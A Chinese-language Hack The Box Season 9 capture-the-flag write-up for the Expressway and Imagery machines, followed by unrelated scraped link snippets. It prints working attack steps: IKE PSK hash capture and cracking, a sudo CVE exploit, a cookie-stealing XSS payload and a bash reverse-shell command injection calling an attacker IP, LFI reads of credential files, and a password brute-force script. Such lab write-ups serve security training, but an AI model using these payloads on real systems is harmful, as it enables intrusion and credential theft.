HTB Season9 week1+wee2 wp
HTB Season9 week1+wee2 wp
Expressway
nmap -A -T4 10.10.11.87
只有22,一般对于这种端口开放很少没有明确入口的,可以尝试扫描Udp端口,或者进行流量监听
nmap -sU 10.10.11.87
开放了udp 500端口
ike-scan -M 10.10.11.87
可以发现AUTH的值为PSK,这意味着VPN是使用预共享密钥配置的
VID=09002689dfd6b712 (XAUTH)和VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)表明实现了XAUTH(扩展认证)和DPD
最后一行的1 returned handshake; 0 returned notify 意味着目标已配置IPsec并愿意执行IKE协商,且您提议的一种或多种转换方案是可接受的(有效转换方案将在输出中显示)
即这是一个 支持 IKE PSK + XAUTH 的 VPN 端点(通常意味着远程登录需要两个因素:PSK + XAUTH 用户/密码)。如果能获取 PSK 或者得到 Aggressive Mode 的 HASH_R,就可以进行离线暴力破解
指纹识别一下
ike-scan -M --showbackoff 10.10.11.87
这里判断出是Linksys Etherfast
使用ike-scan暴力破解ID(用户)
加上-P参数,用于尝试收集hash
ike-scan -P -M -A -n fakeID 10.10.11.87
这是一个使用PSK(预共享密钥)认证的IKEv1 Aggressive Mode 握手,ike-scan已成功把能用于离线破解的参数(也叫HASH_R/PSK参数串)从目标端口抓下来了
且可以通过Value=ike@expressway.htb 可以知道XAUTH的用户ID就是ike
破解hash
将上面得到的密文存入hash.txt
psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt
获取到了key: freakingrockstarontheroad
有了用户和密码就可以尝试登陆了
ssh ike@10.10.11.87
password: freakingrockstarontheroad
root
翻一下sh文件,可以看到CVE-2025-32463
https://github.com/pr0v3rbs/CVE-2025-32463_chwoot
sudo -V 看版本
sudo -R a a 验证漏洞
./sudo.sh
验证漏洞
Imagery
nmap -A -T4 10.10.11.88
扫出22、3000、8000端口
有用的是8000端口
whatweb -v 10.10.11.88:8000
但并没有什么过多的信息,只是告诉我们是python后端
我们先随意注册一个账号
chenz@qq.comi/123456
登陆后,有个文件上传
上传图片后能下载
<div id="no-admin-user-message" class="bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700 p-4 rounded-md mb-6" role="alert" style="display: none;">
<p class="font-bold">No Administrator Found!</p>
<p>It looks like there are no administrator accounts registered yet. The first user to register will automatically become the administrator. Please register an account to gain admin access.</p>
</div>
翻译过来就是首位注册的用户将自动成为管理员。请注册一个账户以获取管理员权限。
可以访问一下/admin/users试试
但发现不是管理员,说明系统已经注册了一个管理员帐号了
XSS
这里能提交你的bug,说明多半管理员会看,就可以尝试打一波XSS
data.bug_reports.forEach(report => {
const reportCard = document.createElement('div');
reportCard.className = 'bg-white p-6 rounded-xl shadow-md border-l-4 border-purple-500 flex justify-between items-center';
reportCard.innerHTML = `
<div>
<p class="text-sm text-gray-500 mb-2">Report ID: ${DOMPurify.sanitize(report.id)}</p>
<p class="text-sm text-gray-500 mb-2">Submitted by: ${DOMPurify.sanitize(report.reporter)} (ID: ${DOMPurify.sanitize(report.reporterDisplayId)}) on ${new Date(report.timestamp).toLocaleString()}</p>
<h3 class="text-xl font-semibold text-gray-800 mb-3">Bug Name: ${DOMPurify.sanitize(report.name)}</h3>
<h3 class="text-xl font-semibold text-gray-800 mb-3">Bug Details:</h3>
<div class="bg-gray-100 p-4 rounded-lg overflow-auto max-h-48 text-gray-700 break-words">
>>>> ${report.details}
</div>
</div>
<button onclick="showDeleteBugReportConfirmation('${DOMPurify.sanitize(report.id)}')" class="bg-red-500 hover:bg-red-600 text-white font-bold py-2 px-4 rounded-lg shadow-md transition duration-200 ml-4">
Delete
</button>
`;
bugReportsList.appendChild(reportCard);
});
可以看到${report.details}没有经过DOMPurify处理,那就存在XSS注入
补充一下,DOMPurify
import DOMPurify from 'dompurify';
// 假设这是用户输入的包含恶意代码的内容
const dirtyHTML = '<img src=x onerror="alert(\'XSS\')"> <p>安全内容</p>';
// 净化处理
const cleanHTML = DOMPurify.sanitize(dirtyHTML);
// 净化后结果:<img src="x"> <p>安全内容</p>(危险的onerror被移除)
document.body.innerHTML = cleanHTML;
DOMPurify 被广泛用于需要处理不可信 HTML 内容的场景,比如内容管理系统、论坛、评论区等,是防御 XSS 攻击的重要工具之一。
也就是Bug Details存在XSS注入
构造payload
<img src="x" onerror="this.src='http://10.10.16.48:4444/steal?cookie=' + encodeURIComponent(document.cookie)">
可以反弹管理员的cookie
可以看到验证成功为admin
将cookie放到浏览器
LFI
然后下载一个log
尝试一下目录穿越读取/etc/passwd(直接/etc/passwd也行)
在/proc/self/cwd/config.py处可以获取到配置文件
import os
import ipaddress
DATA_STORE_PATH = 'db.json'
UPLOAD_FOLDER = 'uploads'
SYSTEM_LOG_FOLDER = 'system_logs'
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
os.makedirs(os.path.join(UPLOAD_FOLDER, 'admin'), exist_ok=True)
os.makedirs(os.path.join(UPLOAD_FOLDER, 'admin', 'converted'), exist_ok=True)
os.makedirs(os.path.join(UPLOAD_FOLDER, 'admin', 'transformed'), exist_ok=True)
os.makedirs(SYSTEM_LOG_FOLDER, exist_ok=True)
MAX_LOGIN_ATTEMPTS = 10
ACCOUNT_LOCKOUT_DURATION_MINS = 1
ALLOWED_MEDIA_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif', 'bmp', 'tiff', 'pdf'}
ALLOWED_IMAGE_EXTENSIONS_FOR_TRANSFORM = {'jpg', 'jpeg', 'png', 'gif', 'bmp', 'tiff'}
ALLOWED_UPLOAD_MIME_TYPES = {
'image/jpeg',
'image/png',
'image/gif',
'image/bmp',
'image/tiff',
'application/pdf'
}
ALLOWED_TRANSFORM_MIME_TYPES = {
'image/jpeg',
'image/png',
'image/gif',
'image/bmp',
'image/tiff'
}
MAX_FILE_SIZE_MB = 1
MAX_FILE_SIZE_BYTES = MAX_FILE_SIZE_MB * 1024 * 1024
BYPASS_LOCKOUT_HEADER = 'X-Bypass-Lockout'
BYPASS_LOCKOUT_VALUE = os.getenv('CRON_BYPASS_TOKEN', 'default-secret-token-for-dev')
FORBIDDEN_EXTENSIONS = {'php', 'php3', 'php4', 'php5', 'phtml', 'exe', 'sh', 'bat', 'cmd', 'js', 'jsp', 'asp', 'aspx', 'cgi', 'pl', 'py', 'rb', 'dll', 'vbs', 'vbe', 'jse', 'wsf', 'wsh', 'psc1', 'ps1', 'jar', 'com', 'svg', 'xml', 'html', 'htm'}
BLOCKED_APP_PORTS = {8080, 8443, 3000, 5000, 8888, 53}
OUTBOUND_BLOCKED_PORTS = {80, 8080, 53, 5000, 8000, 22, 21}
PRIVATE_IP_RANGES = [
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('172.0.0.0/12'),
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16')
]
AWS_METADATA_IP = ipaddress.ip_address('169.254.169.254')
IMAGEMAGICK_CONVERT_PATH = '/usr/bin/convert'
EXIFTOOL_PATH = '/usr/bin/exiftool'
里面有个db.json
访问/proc/self/cwd/db.json
{
"users": [
{
"username": "admin@imagery.htb",
"password": "5d9c1d507a3f76af1e5c97a3ad1eaa31",
"isAdmin": true,
"displayId": "a1b2c3d4",
"login_attempts": 0,
"isTestuser": false,
"failed_login_attempts": 0,
"locked_until": null
},
{
"username": "testuser@imagery.htb",
"password": "2c65c8d7bfbca32a3ed42596192384f6",
"isAdmin": false,
"displayId": "e5f6g7h8",
"login_attempts": 0,
"isTestuser": true,
"failed_login_attempts": 0,
"locked_until": null
},
{
"username": "chenzi@qq.com",
"password": "e10adc3949ba59abbe56e057f20f883e",
"displayId": "ebbd90ff",
"isAdmin": false,
"failed_login_attempts": 0,
"locked_until": null,
"isTestuser": false
},
{
"username": "mo@lab",
"password": "81dc9bdb52d04dc20036dbd8313ed055",
"displayId": "4fe70b66",
"isAdmin": false,
"failed_login_attempts": 0,
"locked_until": null,
"isTestuser": false
}
],
"images": [
{
"id": "6504a6f9-1343-4e85-9735-047681293a59",
"filename": "7d92dc63-b0fe-4877-975f-b8325d6b9ba3_hackthebox.jpg",
"url": "/uploads/7d92dc63-b0fe-4877-975f-b8325d6b9ba3_hackthebox.jpg",
"title": "hackthebox",
"description": "",
"timestamp": "2025-10-03T13:20:19.303475",
"uploadedBy": "testuser@imagery.htb",
"uploadedByDisplayId": "e5f6g7h8",
"group": "My Images",
"type": "original",
"actual_mimetype": "image/jpeg"
},
{
"id": "75ef6309-49c1-40d2-b6ea-ee08b2774e6a",
"filename": "admin/transformed/transformed_6f6f4d6e-61f6-4df3-9654-392f9f06bb09.jpg",
"url": "/uploads/admin/transformed/transformed_6f6f4d6e-61f6-4df3-9654-392f9f06bb09.jpg",
"title": "Transformed: hackthebox",
"description": "Transformed from hackthebox (crop).",
"timestamp": "2025-10-03T13:20:39.225252",
"uploadedBy": "testuser@imagery.htb",
"uploadedByDisplayId": "e5f6g7h8",
"group": "Transformed",
"type": "transformed",
"original_id": "6504a6f9-1343-4e85-9735-047681293a59",
"actual_mimetype": "image/jpeg"
}
],
"image_collections": [
{
"name": "My Images"
},
{
"name": "Unsorted"
},
{
"name": "Converted"
},
{
"name": "Transformed"
}
],
"bug_reports": [
{
"id": "a2a08a23-1c41-413c-8a9e-0aea8c85a456",
"name": "1",
"details": "<img src=\"x\" onerror=\"this.src='http://10.10.16.48:4444/steal?cookie=' + encodeURIComponent(document.cookie)\">",
"reporter": "chenzi@qq.com",
"reporterDisplayId": "ebbd90ff",
"timestamp": "2025-10-03T13:08:40.390515"
},
{
"id": "2952a2f5-79d9-452f-981b-f4a61c45eee8",
"name": "1",
"details": "<img src=\"x\" onerror=\"this.src='http://10.10.16.48:4444/steal?cookie=' + encodeURIComponent(document.cookie)\">",
"reporter": "chenzi@qq.com",
"reporterDisplayId": "3c71ebe6",
"timestamp": "2025-10-03T13:10:18.270024"
},
{
"id": "6f69eaf7-2e0e-40b9-b171-f5b399ed70b0",
"name": "1",
"details": "<img src=\"x\" onerror=\"this.src='http://10.10.16.48:4444/steal?cookie=' + encodeURIComponent(document.cookie)\">",
"reporter": "chenzi@qq.com",
"reporterDisplayId": "3c71ebe6",
"timestamp": "2025-10-03T13:10:53.452990"
}
]
}
可以获取到所有网站用户和他们的密码哈希
测试用户可以碰撞出
testuser@imagery.htb/iambatman
去登陆这个用户
抓这个包
可以推断出系统使用的图片编辑工具是 ImageMagick
配置文件中明确定义了 IMAGEMAGICK_CONVERT_PATH = '/usr/bin/convert',而 convert 是 ImageMagick 工具集中最核心的命令行工具之一,用于图像格式转换、缩放、裁剪等处理。
可以猜测后端会通过该接口向ImageMagick工具传递4个参数,然后对图片进行操作
"x":"8;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.48/4444 0>&1' #",
pyAesCrypt 解密
靶机:
nc -q 0 10.10.16.48 8888 < web_20250806_120723.zip.aes
攻击机:
nc -lvnp 8888 > backup.zip.aes
将zip上传到kali分析
file backup.zip.aes
import pyAesCrypt
GREEN = "\033[92m" # 亮绿色
RESET = "\033[0m" # 恢复默认颜色
def decrypt(password, AESfile, output):
try:
res = pyAesCrypt.decryptFile(AESfile, output, str(password))
if not res:
return True
except:
return False
with open('/usr/share/wordlists/rockyou.txt', 'rb') as f: # 可修改路径
passwords = [line.decode('latin1').strip() for line in f]
for password in passwords:
res = decrypt(password, "backup.zip.aes", "backup.zip") # 可修改文件名
if res:
print(f"{GREEN}[+]{password}{RESET}")
break
else:
print(f"[-]{password}")
得到了密码bestfriends
然后解压unzip backup.zip
在db.json中找到了mark
mark@imagery.htb/supersmash
然后尝试用su切换用户
su mark
supersmash
升级一下shell
python3 -c 'import os,pty;pty.spawn("bash")'
root
我们尝试使用了一下,发现是个备份工具
sudo /usr/local/bin/charcol -R
sudo /usr/local/bin/charcol shell
charcol> help
help
[2025-10-03 14:41:06] [INFO]
Charcol Shell Commands:
Backup & Fetch:
backup -i <paths...> [-o <output_file>] [-p <file_password>] [-c <level>] [--type <archive_type>] [-e <patterns...>] [--no-timestamp] [-f] [--skip-symlinks] [--ask-password]
Purpose: Create an encrypted backup archive from specified files/directories.
Output: File will have a '.aes' extension if encrypted. Defaults to '/var/backup/'.
Naming: Automatically adds timestamp unless --no-timestamp is used. If no -o, uses input filename as base.
Permissions: Files created with 664 permissions. Ownership is user:group.
Encryption:
- If '--app-password' is set (status 1) and no '-p <file_password>' is given, uses the application password for encryption.
- If 'no password' mode is set (status 2) and no '-p <file_password>' is given, creates an UNENCRYPTED archive.
Examples:
- Encrypted with file-specific password:
backup -i /home/user/my_docs /var/log/nginx/access.log -o /tmp/web_logs -p <file_password> --verbose --type tar.gz -c 9
- Encrypted with app password (if status 1):
backup -i /home/user/example_file.json
- Unencrypted (if status 2 and no -p):
backup -i /home/user/example_file.json
- No timestamp:
backup -i /home/user/example_file.json --no-timestamp
fetch <url> [-o <output_file>] [-p <file_password>] [-f] [--ask-password]
Purpose: Download a file from a URL, encrypt it, and save it.
Output: File will have a '.aes' extension if encrypted. Defaults to '/var/backup/fetched_file'.
Permissions: Files created with 664 permissions. Ownership is current user:group.
Restrictions: Fetching from loopback addresses (e.g., localhost, 127.0.0.1) is blocked.
Encryption:
- If '--app-password' is set (status 1) and no '-p <file_password>' is given, uses the application password for encryption.
- If 'no password' mode is set (status 2) and no '-p <file_password>' is given, creates an UNENCRYPTED file.
Examples:
- Encrypted:
fetch <URL> -o <output_file_path> -p <file_password> --force
- Unencrypted (if status 2 and no -p):
fetch <URL> -o <output_file_path>
Integrity & Extraction:
list <encrypted_file> [-p <file_password>] [--ask-password]
Purpose: Decrypt and list contents of an encrypted Charcol archive.
Note: Requires the correct decryption password.
Supported Types: .zip.aes, .tar.gz.aes, .tar.bz2.aes.
Example:
list /var/backup/<encrypted_file_name>.zip.aes -p <file_password>
check <encrypted_file> [-p <file_password>] [--ask-password]
Purpose: Decrypt and verify the structural integrity of an encrypted Charcol archive.
Note: Requires the correct decryption password. This checks the archive format, not internal data consistency.
Supported Types: .zip.aes, .tar.gz.aes, .tar.bz2.aes.
Example:
check /var/backup/<encrypted_file_name>.tar.gz.aes -p <file_password>
extract <encrypted_file> <output_directory> [-p <file_password>] [--ask-password]
Purpose: Decrypt an encrypted Charcol archive and extract its contents.
Note: Requires the correct decryption password.
Example:
extract /var/backup/<encrypted_file_name>.zip.aes /tmp/restored_data -p <file_password>
Automated Jobs (Cron):
auto add --schedule "<cron_schedule>" --command "<shell_command>" --name "<job_name>" [--log-output <log_file>]
Purpose: Add a new automated cron job managed by Charcol.
Verification:
- If '--app-password' is set (status 1): Requires Charcol application password (via global --app-password flag).
- If 'no password' mode is set (status 2): Requires system password verification (in interactive shell).
Security Warning: Charcol does NOT validate the safety of the --command. Use absolute paths.
Examples:
- Status 1 (encrypted app password), cron:
CHARCOL_NON_INTERACTIVE=true charcol --app-password <app_password> auto add \
--schedule "0 2 * * *" --command "charcol backup -i /home/user/docs -p <file_password>" \
--name "Daily Docs Backup" --log-output <log_file_path>
- Status 2 (no app password), cron, unencrypted backup:
CHARCOL_NON_INTERACTIVE=true charcol auto add \
--schedule "0 2 * * *" --command "charcol backup -i /home/user/docs" \
--name "Daily Docs Backup" --log-output <log_file_path>
- Status 2 (no app password), interactive:
auto add --schedule "0 2 * * *" --command "charcol backup -i /home/user/docs" \
--name "Daily Docs Backup" --log-output <log_file_path>
(will prompt for system password)
auto list
Purpose: List all automated jobs managed by Charcol.
Example:
auto list
auto edit <job_id> [--schedule "<new_schedule>"] [--command "<new_command>"] [--name "<new_name>"] [--log-output <new_log_file>]
Purpose: Modify an existing Charcol-managed automated job.
Verification: Same as 'auto add'.
Example:
auto edit <job_id> --schedule "30 4 * * *" --name "Updated Backup Job"
auto delete <job_id>
Purpose: Remove an automated job managed by Charcol.
Verification: Same as 'auto add'.
Example:
auto delete <job_id>
Shell & Help:
shell
Purpose: Enter this interactive Charcol shell.
Example:
shell
exit
Purpose: Exit the Charcol shell.
Example:
exit
clear
Purpose: Clear the interactive shell screen.
Example:
clear
help [command]
Purpose: Show help for Charcol or a specific command.
Example:
help backup
Global Flags (apply to all commands unless overridden):
--app-password <password> : Provide the Charcol *application password* directly. Required for 'auto' commands if status 1. Less secure than interactive prompt.
-p, "--password" <password> : Provide the *file encryption/decryption password* directly. Overrides application password for file operations. Less secure than --ask-password.
-v, "--verbose" : Enable verbose output.
--quiet : Suppress informational output (show only warnings and errors).
--log-file <path> : Log all output to a specified file.
--dry-run : Simulate actions without actual file changes (for 'backup' and 'fetch').
--ask-password : Prompt for the *file encryption/decryption password* securely. Overrides -p and application password for file operations.
--no-banner : Do not display the ASCII banner.
-R, "--reset-password-to-default" : Reset application password to default (requires system password verification).
sudo /usr/local/bin/charcol shell
auto add --schedule "*/1 * * * *" --command "cp /root/root.txt /tmp/root2.txt && chmod a+r /tmp/root2.txt" --name "hack"
auto list
exit
cat root2.txt
HTB Season9 week1+wee2 wp的更多相关文章
- HGAME 2023 WP week1
WEEK1 web Classic Childhood Game 一眼顶真,直接翻js文件,在Events.js中找到mota(),猜测是获取flag,var a = ['\x59\x55\x64\x ...
- 【HTB系列】靶机Chaos的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress ...
- 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])
常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...
- wp已死,metro是罪魁祸首!
1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...
- 关于 WP 开发中.xaml 与.xaml.cs 的关系
今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...
- Android,ios,WP三大手机系统对比
从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...
- 搜狗输入法wp风格皮肤
换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...
- 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19
上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...
- 【WP开发】读写剪贴板
在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...
- 【WP开发】不同客户端之间传输加密数据
在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...
随机推荐
- 匈牙利算法C++实现
简介 一般场景是男生和女生配对的问题,现有男生要去配对如果想去配对的女生已经有喜欢的男生了,那就让想去配对的女生已经喜欢的男生挪挪位置,看看想去配对的女生已经喜欢的男生能不能喜欢其他人,给现有配对的男 ...
- java 泛型 3 反射机制
简介 说实话,不太理解反射机制. 不过好像应该是对于特定对于泛型的接口. code package com.company; import java.lang.reflect.*; import ja ...
- 关于random 函数 在linux上可以执行,在windows 上执行不了的问题
简介 RT 解决方案 最终linux上的random函数,发现了这么一句英文 /* These are the functions that actually do things. The rando ...
- Day5 备战CCF-CSP练习
题目描述 给定 \(n\) 个不同的整数,问这些数中有多少对整数,它们的值正好相差 \(1\). 输出格式 输入的第一行包含一个整数 \(n\),表示给定整数的个数. 第二行包含所给定的$ n$ 个整 ...
- RestCloud ETL社区 八月精选问答
- Advanced Algebra高等代数 - 多元建模有多个方程(多元线性)组成 - 使用 NumPy 实现 矩阵的初等行变换:
线性:指多元变量的每一元变量都是1次方(可以将高于1次方的元,以新一元变量代换,求解再做开方运算) 将应用问题转化为 多个多元线性方程,并成一组: 由多元线性方程组 抽出 增广矩阵,并以"消 ...
- 解锁C#异步编程:async/await实战指南,告别卡顿烦恼
还在被同步代码阻塞UI线程卡死界面吗?微软官方数据显示,异步编程可使应用响应速度提升300%! 本文带你彻底掌握C#异步编程精髓:- async/await底层运行机制揭秘- 文件/网络/数据库三大实 ...
- Windows11正式版如何设置电脑自动开机的问题
有很多雨林木风系统的用户都不知道如何设置电脑自动启动吧?其实,这个问题很容易解决的,本文中,我们雨林木风小编就来分享Windows 11正式版设置电脑自动开机的方法.让我们看看吧. 在 Win11 电 ...
- 深度技术Win10系统如何破解开机密码的问题
很多电脑基地的朋友使用win10操作系统已经很多年了.但是,有的小伙伴因为时间太久忘记了开机密码,但是试过好多密码都不对,那这个密码问题要怎么解决呢?下面,就来看看深度技术系统小编,怎么破解win10 ...
- etcd 和 MongoDB 的混沌(故障注入)测试方法
最近在对一些自建的数据库 driver/client 基础库的健壮性做混沌(故障)测试, 去验证了解业务的故障处理机制和恢复时长. 主要涉及到了 MongoDB 和 etcd 这两个基础组件. 本文会 ...